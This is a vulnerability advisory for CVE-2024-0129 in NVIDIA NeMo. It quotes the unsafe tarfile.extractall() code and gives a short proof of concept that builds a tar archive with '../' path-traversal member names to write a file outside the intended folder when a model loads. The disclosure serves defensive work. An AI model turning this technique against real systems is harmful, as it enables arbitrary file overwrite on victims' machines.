HiddenLayer, a Gartner recognized Cool Vendor for AI Security, is the leading provider of Security for AI. Its security platform helps enterprises safeguard the machine learning models behind their most important products. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Founded by a team with deep roots in security and ML, HiddenLayer aims to protect enterprise’s AI from inference, bypass, extraction attacks, and model theft. The company is backed by a group of strategic investors, including M12, Microsoft’s Venture Fund, Moore Strategic Ventures, Booz Allen Ventures, IBM Ventures, and Capital One Ventures.
October 24, 2024
Unsafe extraction of NeMo archive leading to arbitrary file write
CVE Number
CVE-2024-0129
Summary
The _unpack_nemo_file function used by the SaveRestoreConnector class for model loading uses tarfile.extractall() in an unsafe way which can lead to an arbitrary file write when a model is loaded.
Products Impacted
This vulnerability is present in Nvidia NeMo versions prior to r2.0.0rc0.
CVSS Score: 6.3
AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
CWE Categorization
CWE‑22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
Details
The cause of this vulnerability is in the _unpack_nemo_file function within the file /nemo/core/connectors/save_restore_connector.py.
def _unpack_nemo_file(path2file: str, out_folder: str, extract_config_only: bool = False) -> str:
if not os.path.exists(path2file):
raise FileNotFoundError(f"{path2file} does not exist")
# we start with an assumption of uncompressed tar,
# which should be true for versions 1.7.0 and above
tar_header = "r:"
try:
tar_test = tarfile.open(path2file, tar_header)
tar_test.close()
except tarfile.ReadError:
# can be older checkpoint => try compressed tar
tar_header = "r:gz"
tar = tarfile.open(path2file, tar_header)
if not extract_config_only:
tar.extractall(path=out_folder)
else:
members = [x for x in tar.getmembers() if ".yaml" in x.name]
tar.extractall(path=out_folder, members=members)
tar.close()
return out_folder
The _unpack_nemo_file function is used by several functions and classes in NVIDIA NeMo, most notably the SaveRestoreConnector class which is used to save and load NeMo model files from disk.
To replicate this vulnerability, you simply need to create a tar archive containing a file with a relative path and load the archive with the SaveRestoreConnector restore_from function:
import tarfile
open("test.txt","w").write("This is a test file")
def change_name(tarinfo):
tarinfo.name = "../../../../../../../../tmp/" + tarinfo.name
return tarinfo
with tarfile.open("test.nemo", "w:gz") as tar:
tar.add("test.txt", filter=change_name)
#Load the archive with restore_from
import nemo.collections.asr as nemo_asr
model = nemo_asr.models.EncDecDiarLabelModel.restore_from(restore_path="test.nemo")
This results in test.txt being written to the /tmp/ directory: